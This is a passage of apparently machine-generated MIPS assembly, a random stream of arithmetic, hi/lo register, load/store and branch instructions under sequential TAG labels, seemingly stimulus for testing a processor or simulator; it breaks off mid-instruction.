mflo $4 TAG265: lh $4, 0($4) lui $4, 11 addiu $1, $4, 2 sll $0, $0, 0 TAG266: mtlo $4 sll $0, $0, 0 slti $3, $4, 2 ori $2, $3, 10 TAG267: addiu $2, $2, 9 bltz $2, TAG268 lui $2, 10 mtlo $2 TAG268: mthi $2 sll $0, $0, 0 mfhi $1 divu $1, $1 TAG269: and $3, $1, $1 sll $0, $0, 0 lui $3, 15 bne $3, $1, TAG270 TAG270: sll $0, $0, 0 mthi $3 srl $2, $3, 3 mthi $3 TAG271: mult $2, $2 addu $2, $2, $2 sll $0, $0, 0 sll $0, $0, 0 TAG272: sll $0, $0, 0 sltiu $4, $3, 14 bne $3, $4, TAG273 mflo $4 TAG273: bne $4, $4, TAG274 sll $2, $4, 3 bgtz $4, TAG274 div $4, $2 TAG274: div $2, $2 sll $0, $0, 0 sll $2, $2, 7 mult $2, $2 TAG275: mfhi $4 bne $2, $4, TAG276 mthi $2 sb $4, 0($2) TAG276: bgtz $4, TAG277 mtlo $4 mflo $4 lb $1, 0($4) TAG277: blez $1, TAG278 xori $1, $1, 5 lh $4, 0($1) mult $1, $4 TAG278: sltu $1, $4, $4 mult $1, $1 bne $4, $4, TAG279 mflo $2 TAG279: blez $2, TAG280 srl $3, $2, 7 lbu $2, 0($2) mult $3, $2 TAG280: srl $1, $2, 14 bne $1, $1, TAG281 mult $2, $1 mult $1, $2 TAG281: or $4, $1, $1 lui $2, 8 mthi $1 sb $1, 0($1) TAG282: mfhi $3 beq $2, $2, TAG283 lui $4, 12 mfhi $2 TAG283: sll $0, $0, 0 mtlo $2 lui $3, 12 mtlo $3 TAG284: divu $3, $3 multu $3, $3 subu $2, $3, $3 mtlo $2 TAG285: lui $1, 7 sll $0, $0, 0 sh $3, 0($2) sh $2, 0($2) TAG286: sll $1, $3, 5 mthi $1 mflo $3 mfhi $3 TAG287: mult $3, $3 mthi $3 subu $1, $3, $3 mthi $3 TAG288: lbu $3, 0($1) multu $3, $1 mthi $3 lui $3, 4 TAG289: mfhi $1 addu $1, $3, $3 blez $1, TAG290 lui $4, 10 TAG290: bne $4, $4, TAG291 sll $0, $0, 0 sll $0, $0, 0 sltiu $3, $4, 3 TAG291: mthi $3 slti $2, $3, 6 mult $3, $3 mfhi $4 TAG292: bgtz $4, TAG293 lh $1, 0($4) lw $1, 0($1) bltz $1, TAG293 TAG293: lui $4, 0 mtlo $4 lb $1, 0($1) mtlo $1 TAG294: sub $4, $1, $1 slt $2, $1, $1 addu $4, $4, $4 lh $2, 0($4) TAG295: mflo $2 bgtz $2, TAG296 mthi $2 sll $2, $2, 1 TAG296: mult $2, $2 sllv $4, $2, $2 beq $2, $2, TAG297 mthi $4 TAG297: mthi $4 multu $4, $4 mtlo $4 bne $4, $4, TAG298 TAG298: mult $4, $4 mult $4, $4 multu $4, $4 or $1, $4, $4 TAG299: andi $4, $1, 8 bltz $4, TAG300 lui $2, 6 lui $1, 13 TAG300: sll $0, $0, 0 mflo $2 mflo $1 lui $2, 15 TAG301: lui $3, 7 ori $3, $2, 0 srlv $3, $3, $3 sll $0, $0, 0 TAG302: mfhi $1 multu $1, $1 mtlo $3 mthi $3 TAG303: beq $1, $1, TAG304 mult $1, $1 sltiu $4, $1, 12 mfhi $4 TAG304: mthi $4 mult $4, $4 slti $3, $4, 7 blez $4, TAG305 TAG305: mthi $3 sb $3, 0($3) multu $3, $3 mtlo $3 TAG306: bne $3, $3, TAG307 lui $3, 13 sll $0, $0, 0 sll $0, $0, 0 TAG307: mtlo $3 lui $1, 4 mtlo $3 ori $4, $1, 0 TAG308: sll $0, $0, 0 and $3, $4, $4 subu $1, $4, $4 sll $0, $0, 0 TAG309: lhu $3, 0($1) bltz $3, TAG310 lui $2, 6 mflo $2 TAG310: beq $2, $2, TAG311 sra $3, $2, 12 bne $2, $3, TAG311 sw $3, 0($2) TAG311: multu $3, $3 divu $3, $3 bgtz $3, TAG312 mtlo $3 TAG312: blez $3, TAG313 slti $1, $3, 7 sw $3, -208($3) lbu $3, -208($3) TAG313: mthi $3 srl $4, $3, 8 sltiu $3, $4, 5 mfhi $1 TAG314: bne $1, $1, TAG315 sra $2, $1, 11 mtlo $1 mflo $2 TAG315: mthi $2 lui $2, 4 sll $0, $0, 0 div $2, $1 TAG316: bgtz $1, TAG317 sw $1, -208($1) mthi $1 bne $1, $1, TAG317 TAG317: sh $1, -208($1) mult $1, $1 and $4, $1, $1 srav $1, $1, $4 TAG318: srav $3, $1, $1 lui $4, 8 mfhi $4 slti $2, $1, 14 TAG319: mflo $4 lui $4, 14 sb $4, 0($2) mflo $2 TAG320: lui $1, 7 divu $2, $1 sll $0, $0, 0 sll $0, $0, 0 TAG321: lui $2, 13 bltz $2, TAG322 lui $3, 1 bne $2, $2, TAG322 TAG322: sll $0, $0, 0 mflo $4 lb $3, 0($4) lb $1, 48($3) TAG323: subu $1, $1, $1 multu $1, $1 lhu $4, 0($1) or $1, $1, $1 TAG324: bgtz $1, TAG325 lui $1, 12 andi $2, $1, 8 mtlo $1 TAG325: lb $2, 0($2) and $1, $2, $2 mtlo $2 mtlo $1 TAG326: bltz $1, TAG327 sltiu $2, $1, 13 mthi $2 beq $1, $2, TAG327 TAG327: mtlo $2 multu $2, $2 bltz $2, TAG328 sb $2, 0($2) TAG328: mthi $2 bne $2, $2, TAG329 mtlo $2 multu $2, $2 TAG329: sw $2, 0($2) slti $3, $2, 3 addi $2, $2, 10 lb $1, 0($3) TAG330: mfhi $2 mtlo $2 sb $2, 0($2) sh $2, 0($2) TAG331: mfhi $1 multu $2, $1 bne $2, $2, TAG332 lui $4, 9 TAG332: lui $3, 9 sll $0, $0, 0 slti $3, $1, 1 mthi $3 TAG333: sb $3, 0($3) xori $2, $3, 6 mfhi $2 sb $2, 0($2) TAG334: lbu $1, 0($2) mult $1, $2 lbu $4, 0($1) sb $4, 0($1) TAG335: mflo $1 lui $1, 13 sll $0, $0, 0 bltz $1, TAG336 TAG336: sll $0, $0, 0 bgtz $1, TAG337 div $1, $4 lui $2, 10 TAG337: xori $3, $2, 11 bltz $2, TAG338 mthi $3 sb $2, 0($2) TAG338: bgez $3, TAG339 mfhi $1 sh $3, 0($3) beq $1, $3, TAG339 TAG339: mtlo $1 mflo $3 blez $3, TAG340 lh $3, 0($3) TAG340: beq $3, $3, TAG341 sw $3, 0($3) blez $3, TAG341 slti $3, $3, 7 TAG341: lhu $4, 0($3) lui $2, 8 mfhi $1 multu $4, $4 TAG342: sh $1, 0($1) mflo $1 sra $3, $1, 3 mult $3, $1 TAG343: mflo $4 add $4, $3, $3 slt $3, $4, $4 or $4, $4, $3 TAG344: mult $4, $4 srlv $4, $4, $4 mult $4, $4 srl $2, $4, 4 TAG345: sh $2, 0($2) mtlo $2 mthi $2 mthi $2 TAG346: sb $2, 0($2) mult $2, $2 blez $2, TAG347 mfhi $4 TAG347: mtlo $4 bgtz $4, TAG348 xor $3, $4, $4 sb $4, 0($4) TAG348: mult $3, $3 mflo $2 blez $2, TAG349 lb $2, 0($2) TAG349: multu $2, $2 mflo $1 lui $3, 5 lui $2, 5 TAG350: lui $2, 2 slti $1, $2, 10 sll $0, $0, 0 lhu $4, 0($1) TAG351: lui $3, 3 bgtz $4, TAG352 addu $3, $3, $4 sll $1, $3, 3 TAG352: srav $2, $1, $1 sll $0, $0, 0 mflo $2 sll $0, $0, 0 TAG353: multu $2, $2 lw $3, 0($2) bgtz $3, TAG354 lui $1, 13 TAG354: bne $1, $1, TAG355 lui $3, 10 sll $0, $0, 0 nor $4, $1, $3 TAG355: mtlo $4 divu $4, $4 mthi $4 multu $4, $4 TAG356: beq $4, $4, TAG357 xori $2, $4, 7 lh $1, 0($2) bgez $4, TAG357 TAG357: andi $2, $1, 6 sw $2, 0($2) andi $3, $2, 14 subu $4, $1, $1 TAG358: multu $4, $4 multu $4, $4 addi $3, $4, 14 mflo $1 TAG359: lui $3, 12 sb $3, 0($1) sll $0, $0, 0 andi $3, $2, 4 TAG360: blez $3, TAG361 lui $4, 4 bltz $4, TAG361 sub $3, $4, $3 TAG361: bltz $3, TAG362 mult $3, $3 addiu $4, $3, 11 and $4, $3, $3 TAG362: mfhi $1 lui $4, 8 sh $4, 0($1) mfhi $1 TAG363: mfhi $2 lbu $2, 0($2) lui $2, 11 subu $3, $2, $2 TAG364: multu $3, $3 mthi $3 lui $3, 8 beq $3, $3, TAG365 TAG365: lui $2, 8 beq $2, $2, TAG366 lui $4, 7 lhu $3, 0($3) TAG366: bgez $3, TAG367 sll $0, $0, 0 bltz $3, TAG367 div $3, $3 TAG367: sll $0, $0, 0 mult $3, $3 mtlo $3 mthi $2 TAG368: divu $2, $2 mfhi $2 lui $4, 8 multu $4, $2 TAG369: sll $0, $0, 0 sra $1, $4, 10 sll $0, $0, 0 multu $3, $4 TAG370: sll $0, $0, 0 mflo $4 beq $4, $4, TAG371 mtlo $3 TAG371: mfhi $3 add $3, $4, $3 mult $4, $3 bltz $4, TAG372 TAG372: sra $4, $3, 8 sb $3, 0($4) lhu $3, 0($3) div $4, $3 TAG373: lui $2, 5 nor $1, $3, $2 sll $0, $0, 0 lui $1, 0 TAG374: bne $1, $1, TAG375 mthi $1 and $2, $1, $1 lh $1, 0($1) TAG375: or $2, $1, $1 mfhi $3 lbu $4, 0($1) lui $3, 15 TAG376: mfhi $1 lh $2, 0($1) bltz $3, TAG377 sw $2, 0($1) TAG377: mtlo $2 bltz $2, TAG378 mthi $2 lw $1, 0($2) TAG378: bne $1, $1, TAG379 sll $3, $1, 4 mthi $3 mfhi $2 TAG379: bgtz $2, TAG380 addiu $4, $2, 7 lw $4, 0($2) mfhi $4 TAG380: beq $4, $4, TAG381 mult $4, $4 lui $2, 9 bgez $2, TAG381 TAG381: multu $2, $2 bgez $2, TAG382 addiu $4, $2, 6 bgez $4, TAG382 TAG382: addiu $2, $4, 14 lui $2, 5 multu $4, $2 divu $4, $4 TAG383: lui $4, 7 beq $2, $2, TAG384 sll $0, $0, 0 beq $4, $4, TAG384 TAG384: sll $0, $0, 0 sll $0, $0, 0 srlv $2, $4, $4 lui $1, 0 TAG385: sub $3, $1, $1 addi $1, $1, 12 sh $1, 0($1) or $4, $1, $3 TAG386: div $4, $4 sb $4, 0($4) andi $1, $4, 7 mflo $2 TAG387: lui $4, 12 lui $2, 13 sll $0, $0, 0 sll $0, $0, 0 TAG388: sub $1, $3, $3 nor $2, $3, $3 and $4, $3, $1 lhu $3, 1($2) TAG389: bne $3, $3, TAG390 lui $3, 13 sll $0, $0, 0 sllv $3, $3, $3 TAG390: mflo $1 sll $3, $1, 10 sltiu $4, $3, 5 addiu $4, $3, 3 TAG391: lui $4, 10 nor $3, $4, $4 mflo $4 or $1, $3, $4 TAG392: mult $1, $1 bne $1, $1, TAG393 div $1, $1 mtlo $1 TAG393: sll $4, $1, 12 xori $2, $1, 11 sra $1, $4, 12 addu $3, $1, $4 TAG394: divu $3, $3 div $3, $3 bne $3, $3, TAG395 divu $3, $3 TAG395: beq $3, $3, TAG396 mtlo $3 sll $2, $3, 0 blez $3, TAG396 TAG396: divu $2, $2 mtlo $2 andi $1, $2, 8 bne $1, $1, TAG397 TAG397: nor $2, $1, $1 addu $3, $2, $2 blez $2, TAG398 lui $4, 2 TAG398: sll $0, $0, 0 mtlo $4 bne $4, $4, TAG399 sllv $3, $4, $4 TAG399: lui $1, 5 addu $2, $3, $1 bgez $3, TAG400 sll $2, $1, 7 TAG400: lui $1, 13 sllv $1, $2, $2 mthi $1 or $4, $1, $2 TAG401: bgez $4, TAG402 sll $0, $0, 0 bne $4, $4, TAG402 mfhi $4 TAG402: sll $0, $0, 0 beq $3, $4, TAG403 lui $4, 11 div $3, $4 TAG403: mtlo $4 multu $4, $4 bltz $4, TAG404 lui $1, 3 TAG404: mult $1, $1 blez $1, TAG405 sll $0, $0, 0 bltz $1, TAG405 TAG405: sll $0, $0, 0 bgez $1, TAG406 lui $1, 7 andi $4, $1, 4 TAG406: sll $0, $0, 0 mtlo $4 sll $0, $0, 0 sll $0, $0, 0 TAG407: subu $1, $4, $4 addi $1, $1, 15 sll $0, $0, 0 mtlo $1 TAG408: mflo $2 sb $1, 0($2) bgtz $2, TAG409 sb $1, 0($2) TAG409: sb $2, 0($2) lui $3, 15 bne $2, $3, TAG410 or $4, $2, $2 TAG410: mflo $4 sltu $1, $4, $4 mtlo $4 bne $4, $4, TAG411 TAG411: lui $4, 13 bne $1, $4, TAG412 sltiu $3, $4, 2 div $3, $4 TAG412: lb $2, 0($3) beq $2, $3, TAG413 andi $4, $3, 3 bgtz $3, TAG413 TAG413: lui $3, 9 and $3, $3, $3 xori $3, $3, 5 bgtz $3, TAG414 TAG414: srl $4, $3, 0 bne $4, $4, TAG415 mflo $4 mthi $3 TAG415: lui $2, 13 mflo $2 mult $2, $4 mflo $4 TAG416: srav $4, $4, $4 lui $3, 1 bgez $4, TAG417 addu $2, $4, $3 TAG417: addiu $1, $2, 6 lui $1, 2 mtlo $1 sll $0, $0, 0 TAG418: sll $0, $0, 0 addiu $3, $3, 6 lui $1, 13 sll $0, $0, 0 TAG419: blez $2, TAG420 mtlo $2 bgtz $2, TAG420 mflo $2 TAG420: mfhi $1 lui $1, 9 mtlo $2 sll $0, $0, 0 TAG421: divu $2, $2 mthi $2 bne $2, $2, TAG422 sll $0, $0, 0 TAG422: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 bne $3, $2, TAG423 TAG423: multu $4, $4 lh $4, 0($4) mfhi $2 bgtz $4, TAG424 TAG424: addiu $4, $2, 15 lb $4, 0($4) slt $1, $4, $2 beq $2, $4, TAG425 TAG425: sb $1, 0($1) mflo $1 ori $1, $1, 5 mfhi $2 TAG426: lui $4, 6 mult $2, $2 mult $4, $2 lui $3, 5 TAG427: lui $1, 5 mflo $4 mthi $4 lui $2, 8 TAG428: lui $2, 9 mflo $4 mult $4, $2 sw $2, 0($4) TAG429: lw $3, 0($4) subu $3, $4, $3 sll $0, $0, 0 lhu $3, 0($4) TAG430: sh $3, 0($3) addi $1, $3, 3 lui $4, 0 sh $4, 0($3) TAG431: beq $4, $4, TAG432 mtlo $4 sll $1, $4, 11 lh $4, 0($1) TAG432: beq $4, $4, TAG433 lui $4, 8 lb $3, 0($4) lui $1, 13 TAG433: mthi $1 lui $3, 11 div $3, $3 srlv $2, $1, $1 TAG434: lb $4, 0($2) srav $4, $4, $4 beq $4, $2, TAG435 nor $3, $4, $4 TAG435: div $3, $3 lh $4, 1($3) multu $4, $3 slti $1, $4, 2 TAG436: multu $1, $1 sllv $3, $1, $1 addu $3, $1, $3 lui $2, 14 TAG437: sll $0, $0, 0 lui $2, 5 sll $0, $0, 0 sb $2, 0($4) TAG438: mtlo $2 sltiu $4, $2, 6 addu $4, $2, $4 divu $2, $2 TAG439: bne $4, $4, TAG440 sll $0, $0, 0 mfhi $2 multu $4, $2 TAG440: sw $2, 0($2) lui $2, 2 divu $2, $2 sll $0, $0, 0 TAG441: mtlo $4 bltz $4, TAG442 sll $0, $0, 0 sll $0, $0, 0 TAG442: sll $0, $0, 0 mtlo $4 sll $0, $0, 0 andi $1, $4, 8 TAG443: lb $1, 0($1) mult $1, $1 lw $3, 0($1) multu $1, $1 TAG444: blez $3, TAG445 mtlo $3 xor $2, $3, $3 mtlo $2 TAG445: xori $1, $2, 1 mfhi $1 mtlo $2 ori $4, $1, 11 TAG446: sb $4, 0($4) sb $4, 0($4) multu $4, $4 lbu $3, 0($4) TAG447: lui $4, 2 lui $2, 10 bne $4, $2, TAG448 lb $2, 0($3) TAG448: sra $4, $2, 8 lb $4, 0($4) lui $1, 1 bne $4, $2, TAG449 TAG449: ori $2, $1, 2 mtlo $2 sll $0, $0, 0 mfhi $1 TAG450: mult $1, $1 sw $1, 0($1) bne $1, $1, TAG451 mthi $1 TAG451: bgtz $1, TAG452 sub $1, $1, $1 lui $1, 2 addu $2, $1, $1 TAG452: mthi $2 sll $0, $0, 0 lui $4, 12 srl $4, $4, 7 TAG453: mflo $3 lui $2, 9 lui $4, 1 lbu $4, 0($3) TAG454: nor $4, $4, $4 or $2, $4, $4 sb $4, 1($4) beq $4, $2, TAG455 TAG455: addiu $1, $2, 14 blez $1, TAG456 lui $3, 14 srlv $3, $3, $1 TAG456: lui $4, 15 xor $3, $4, $4 blez $4, TAG457 sll $0, $0, 0 TAG457: bltz $1, TAG458 sra $4, $1, 2 lui $2, 14 lui $4, 14 TAG458: sll $0, $0, 0 sll $0, $0, 0 lui $4, 12 srlv $4, $3, $4 TAG459: mult $4, $4 bne $4, $4, TAG460 mthi $4 add $3, $4, $4 TAG460: sb $3, 0($3) lb $1, 0($3) sh $3, 0($3) sh $1, 0($1) TAG461: sw $1, 0($1) add $2, $1, $1 bne $2, $2, TAG462 mtlo $1 TAG462: sb $2, 0($2) sb $2, 0($2) lh $4, 0($2) lui $1, 1 TAG463: nor $1, $1, $1 sll $0, $0, 0 sll $0, $0, 0 bgez $1, TAG464 TAG464: lui $4, 12 sll $0, $0, 0 divu $4, $4 bne $2, $2, TAG465 TAG465: addiu $2, $4, 12 bne $2, $2, TAG466 mtlo $2 lui $2, 2 TAG466: bgtz $2, TAG467 lui $2, 15 lhu $1, 0($2) mflo $4 TAG467: sll $0, $0, 0 lui $1, 11 or $1, $4, $1 mfhi $4 TAG468: blez $4, TAG469 lh $3, 0($4) sw $4, 0($3) lh $3, 0($3) TAG469: mthi $3 lh $4, 0($3) mfhi $4 sra $4, $4, 10 TAG470: mult $4, $4 lh $2, 0($4) sb $4, 0($2) mthi $2 TAG471: mfhi $1 lbu $2, 0($2) lui $1, 1 sb $1, 0($2) TAG472: lui $4, 4 mthi $1 mflo $3 sll $0, $0, 0 TAG473: sh $3, 0($3) lb $1, 0($3) lh $3, 0($3) sb $3, 0($3) TAG474: beq $3, $3, TAG475 mthi $3 xor $3, $3, $3 mtlo $3 TAG475: xori $3, $3, 11 mfhi $4 bltz $3, TAG476 div $4, $3 TAG476: lui $1, 11 mthi $4 sll $0, $0, 0 lui $2, 4 TAG477: bgtz $2, TAG478 divu $2, $2 lui $3, 0 blez $2, TAG478 TAG478: lui $1, 7 multu $3, $1 mflo $3 sll $0, $0, 0 TAG479: sll $0, $0, 0 bne $3, $3, TAG480 mtlo $3 srl $4, $3, 10 TAG480: sll $0, $0, 0 sb $1, -4928($4) divu $1, $1 bltz $1, TAG481 TAG481: xor $2, $1, $1 bltz $1, TAG482 mfhi $4 andi $2, $4, 6 TAG482: sh $2, 0($2) slt $2, $2, $2 mtlo $2 lui $3, 11 TAG483: bgez $3, TAG484 div $3, $3 sb $3, 0($3) andi $1, $3, 10 TAG484: sltu $3, $1, $1 addiu $2, $1, 14 blez $3, TAG485 mthi $1 TAG485: sll $0, $0, 0 mfhi $3 mflo $2 andi $2, $3, 13 TAG486: lb $1, 0($2) blez $2, TAG487 mthi $2 bne $1, $1, TAG487 TAG487: sb $1, 0($1) lui $1, 11 mflo $2 mtlo $1 TAG488: sb $2, 0($2) lui $2, 3 lui $1, 12 sll $0, $0, 0 TAG489: slti $3, $1, 6 mtlo $3 addiu $1, $1, 11 lui $4, 15 TAG490: sltu $2, $4, $4 mflo $4 sltiu $2, $4, 7 sb $4, 0($2) TAG491: xor $4, $2, $2 blez $4, TAG492 multu $4, $4 div $2, $2 TAG492: lh $1, 0($4) lui $4, 5 mthi $1 addiu $2, $1, 5 TAG493: subu $1, $2, $2 multu $1, $2 mult $1, $1 bne $1, $1, TAG494 TAG494: sb $1, 0($1) lw $2, 0($1) lui $1, 3 lui $1, 3 TAG495: sll $0, $0, 0 sll $0, $0, 0 andi $1, $1, 3 mflo $2 TAG496: lw $4, 0($2) blez $4, TAG497 lb $1, 0($4) mfhi $4 TAG497: mult $4, $4 lui $3, 12 subu $1, $4, $3 mflo $1 TAG498: lui $2, 8 mtlo $2 lhu $2, 0($1) lui $2, 10 TAG499: mthi $2 sll $0, $0, 0 bltz $2, TAG500 add $2, $4, $4 TAG500: bgtz $2, TAG501 mtlo $2 lui $4, 8 mtlo $2 TAG501: sll $0, $0, 0 lh $1, 0($1) mflo $3 lui $2, 13 TAG502: lui $2, 3 sllv $1, $2, $2 div $2, $1 bne $2, $2, TAG503 TAG503: sll $0, $0, 0 divu $1, $1 sll $0, $0, 0 mthi $1 TAG504: div $2, $2 sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 TAG505: lbu $3, 0($3) sra $1, $3, 11 lw $1, 0($1) bltz $3, TAG506 TAG506: sb $1, 0($1) lh $1, 0($1) mflo $2 sltiu $4, $1, 9 TAG507: subu $1, $4, $4 mtlo $4 multu $4, $4 xori $4, $4, 8 TAG508: lui $3, 2 lui $2, 0 subu $3, $2, $2 mthi $3 TAG509: lb $2, 0($3) lui $1, 7 mflo $1 mflo $1 TAG510: mtlo $1 lb $3, 0($1) lb $2, 0($1) multu $3, $2 TAG511: mult $2, $2 lui $1, 11 bgez $2, TAG512 mthi $2 TAG512: sll $0, $0, 0 addiu $2, $1, 9 bne $1, $1, TAG513 and $1, $1, $1 TAG513: lui $1, 1 mflo $4 sll $0, $0, 0 sltiu $3, $1, 1 TAG514: beq $3, $3, TAG515 slt $4, $3, $3 multu $3, $3 div $3, $3 TAG515: mflo $3 sb $3, 0($4) sb $3, 0($4) lui $1, 14 TAG516: addu $3, $1, $1 ori $2, $1, 8 or $4, $3, $3 lui $4, 10 TAG517: mthi $4 mthi $4 lui $3, 8 srl $4, $4, 4 TAG518: addiu $3, $4, 0 beq $3, $4, TAG519 sll $0, $0, 0 mthi $4 TAG519: mflo $2 lui $4, 12 sll $0, $0, 0 div $1, $3 TAG520: bne $1, $1, TAG521 mfhi $4 lui $3, 1 srlv $3, $1, $1 TAG521: mthi $3 mthi $3 div $3, $3 addu $3, $3, $3 TAG522: mflo $2 mult $2, $3 sb $2, 0($2) beq $3, $3, TAG523 TAG523: mflo $3 mthi $2 multu $3, $2 mflo $1 TAG524: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 blez $1, TAG525 TAG525: mthi $1 mthi $1 sll $0, $0, 0 or $1, $1, $1 TAG526: sll $0, $0, 0 lui $1, 8 div $1, $4 beq $1, $1, TAG527 TAG527: mult $1, $1 lui $1, 12 sltiu $2, $1, 10 sll $0, $0, 0 TAG528: beq $2, $2, TAG529 lui $4, 6 blez $2, TAG529 sh $2, 0($2) TAG529: or $2, $4, $4 sll $0, $0, 0 lui $1, 7 lui $3, 9 TAG530: sllv $3, $3, $3 blez $3, TAG531 div $3, $3 sll $0, $0, 0 TAG531: sll $0, $0, 0 bne $2, $2, TAG532 sll $0, $0, 0 sra $2, $2, 11 TAG532: sb $2, -192($2) sh $2, -192($2) slt $4, $2, $2 lui $2, 13 TAG533: sll $0, $0, 0 lui $3, 13 subu $3, $3, $2 sll $0, $0, 0 TAG534: sw $3, 0($3) lui $2, 7 mult $3, $2 mfhi $1 TAG535: and $4, $1, $1 beq $4, $1, TAG536 mflo $4 srav $1, $4, $4 TAG536: bgtz $1, TAG537 mflo $1 lui $2, 12 bne $2, $1, TAG537 TAG537: slt $3, $2, $2 bgez $2, TAG538 ori $1, $2, 7 mflo $1 TAG538: divu $1, $1 sll $0, $0, 0 beq $1, $1, TAG539 and $4, $1, $1 TAG539: subu $4, $4, $4 lui $2, 8 bltz $4, TAG540 add $1, $4, $4 TAG540: lhu $1, 0($1) bltz $1, TAG541 addi $2, $1, 13 andi $2, $2, 2 TAG541: multu $2, $2 sb $2, 0($2) mthi $2 lbu $2, 0($2) TAG542: mfhi $1 sb $1, 0($2) lb $2, 0($1) mult $1, $2 TAG543: lui $4, 8 mfhi $3 bne $3, $2, TAG544 mflo $1 TAG544: sllv $2, $1, $1 mflo $4 lhu $2, 0($4) mflo $3 TAG545: bne $3, $3, TAG546 xor $2, $3, $3 mult $2, $3 lui $1, 14 TAG546: mult $1, $1 addu $3, $1, $1 bgtz $3, TAG547 divu $3, $3 TAG547: mthi $3 sll $0, $0, 0 srl $3, $3, 7 mfhi $1 TAG548: mflo $1 mflo $1 blez $1, TAG549 lui $2, 14 TAG549: sll $0, $0, 0 mtlo $1 sll $0, $0, 0 sll $0, $0, 0 TAG550: lui $4, 8 bgtz $4, TAG551 sll $0, $0, 0 beq $4, $4, TAG551 TAG551: srl $3, $4, 4 mflo $4 lui $3, 5 mflo $3 TAG552: slti $3, $3, 2 divu $3, $3 multu $3, $3 bne $3, $3, TAG553 TAG553: mflo $3 mtlo $3 bgtz $3, TAG554 nor $1, $3, $3 TAG554: sll $0, $0, 0 mtlo $2 srav $4, $1, $1 srl $3, $2, 8 TAG555: bne $3, $3, TAG556 mflo $2 lui $1, 9 sltiu $4, $3, 10 TAG556: mult $4, $4 mfhi $1 lui $3, 12 sll $0, $0, 0 TAG557: srlv $3, $4, $4 mthi $4 sb $3, 0($4) bgtz $3, TAG558 TAG558: mflo $1 xori $1, $1, 9 sll $1, $1, 11 lh $3, -18432($1) TAG559: lh $1, 0($3) mflo $1 srav $1, $1, $1 sh $1, 0($1) TAG560: mflo $2 ori $2, $2, 4 slti $1, $2, 2 mfhi $4 TAG561: lui $3, 3 mult $4, $4 lui $2, 12 mthi $4 TAG562: sltiu $4, $2, 8 multu $2, $2 blez $2, TAG563 lui $1, 11 TAG563: sll $0, $0, 0 mtlo $1 sll $0, $0, 0 mtlo $4 TAG564: mult $4, $4 sb $4, 0($4) lhu $2, 0($4) bltz $2, TAG565 TAG565: lw $4, 0($2) lui $1, 5 lh $4, 0($4) sh $2, 0($4) TAG566: multu $4, $4 beq $4, $4, TAG567 mthi $4 lui $4, 14 TAG567: mthi $4 xori $4, $4, 7 mfhi $2 div $4, $4 TAG568: add $2, $2, $2 multu $2, $2 lui $2, 11 lui $4, 4 TAG569: mthi $4 sll $0, $0, 0 mfhi $1 lui $4, 8 TAG570: addiu $1, $4, 10 divu $1, $1 bgtz $1, TAG571 mtlo $4 TAG571: mfhi $4 or $4, $1, $4 lui $4, 7 multu $1, $4 TAG572: sll $0, $0, 0 mult $3, $3 lui $1, 3 beq $1, $4, TAG573 TAG573: mthi $1 sll $0, $0, 0 bne $2, $1, TAG574 sltiu $1, $2, 14 TAG574: addi $4, $1, 1 bltz $4, TAG575 lb $2, 0($4) sll $2, $4, 7 TAG575: beq $2, $2, TAG576 mflo $4 mult $4, $4 mflo $3 TAG576: sra $4, $3, 12 bltz $4, TAG577 sb $4, 0($4) sb $4, 0($4) TAG577: addu $1, $4, $4 bne $1, $4, TAG578 lb $4, 0($1) bne $1, $4, TAG578 TAG578: lh $1, 0($4) sltu $1, $1, $1 bgez $1, TAG579 add $4, $1, $4 TAG579: ori $3, $4, 12 beq $4, $3, TAG580 sh $4, 0($3) bltz $3, TAG580 TAG580: sltiu $2, $3, 13 xor $3, $3, $2 subu $1, $2, $3 mflo $2 TAG581: sw $2, 0($2) mult $2, $2 lui $1, 0 beq $2, $1, TAG582 TAG582: xor $4, $1, $1 or $3, $4, $4 mfhi $1 mthi $3 TAG583: srlv $2, $1, $1 lhu $2, 0($1) lbu $2, 0($2) sw $2, 0($2) TAG584: lui $4, 2 mthi $4 sra $3, $4, 12 sll $0, $0, 0 TAG585: lui $2, 15 sb $2, 0($3) bltz $2, TAG586 divu $3, $3 TAG586: mtlo $2 mflo $4 lui $3, 11 sltu $2, $4, $2 TAG587: lui $1, 5 srl $3, $2, 3 nor $2, $1, $2 mult $3, $3 TAG588: beq $2, $2, TAG589 slti $3, $2, 12 xor $2, $3, $3 multu $2, $2 TAG589: lui $2, 0 lui $1, 3 sra $1, $1, 0 mtlo $1 TAG590: lui $2, 0 div $2, $1 bltz $1, TAG591 srl $3, $2, 7 TAG591: sh $3, 0($3) lhu $3, 0($3) beq $3, $3, TAG592 sh $3, 0($3) TAG592: multu $3, $3 mtlo $3 bltz $3, TAG593 lui $2, 7 TAG593: lui $4, 9 lui $2, 7 lui $2, 4 multu $2, $2 TAG594: bltz $2, TAG595 sll $0, $0, 0 addiu $1, $2, 6 sll $0, $0, 0 TAG595: bne $2, $2, TAG596 mfhi $4 mult $2, $2 bltz $4, TAG596 TAG596: lb $4, 0($4) bltz $4, TAG597 ori $3, $4, 6 mflo $4 TAG597: sltiu $4, $4, 6 mtlo $4 div $4, $4 sb $4, 0($4) TAG598: blez $4, TAG599 mtlo $4 divu $4, $4 sll $3, $4, 15 TAG599: mflo $1 lbu $4, 0($1) bgez $3, TAG600 xor $1, $3, $4 TAG600: slt $1, $1, $1 lh $2, 0($1) bne $2, $2, TAG601 mtlo $2 TAG601: subu $1, $2, $2 lh $3, 0($1) mtlo $3 lhu $4, -256($3) TAG602: sb $4, -256($4) sh $4, -256($4) lui $1, 6 xor $3, $1, $1 TAG603: beq $3, $3, TAG604 lb $2, 0($3) beq $3, $3, TAG604 mfhi $1 TAG604: mtlo $1 addiu $4, $1, 4 mtlo $4 divu $4, $1 TAG605: sra $4, $4, 5 lui $1, 7 mthi $4 srlv $2, $4, $4 TAG606: div $2, $2 sll $3, $2, 8 bgez $3, TAG607 sh $3, -12288($2) TAG607: mflo $2 mfhi $1 sll $3, $1, 11 srl $1, $1, 2 TAG608: multu $1, $1 beq $1, $1, TAG609 multu $1, $1 mthi $1 TAG609: sh $1, 0($1) bltz $1, TAG610 mtlo $1 mtlo $1 TAG610: mult $1, $1 lw $2, 0($1) lui $1, 13 blez $2, TAG611 TAG611: mfhi $3 mult $3, $3 divu $1, $1 bne $1, $3, TAG612 TAG612: mfhi $1 lui $3, 0 blez $3, TAG613 mflo $2 TAG613: lb $3, 0($2) lbu $1, 0($2) lui $3, 7 bne $3, $1, TAG614 TAG614: mfhi $2 mult $3, $3 mult $3, $2 bne $3, $2, TAG615 TAG615: multu $2, $2 mult $2, $2 addi 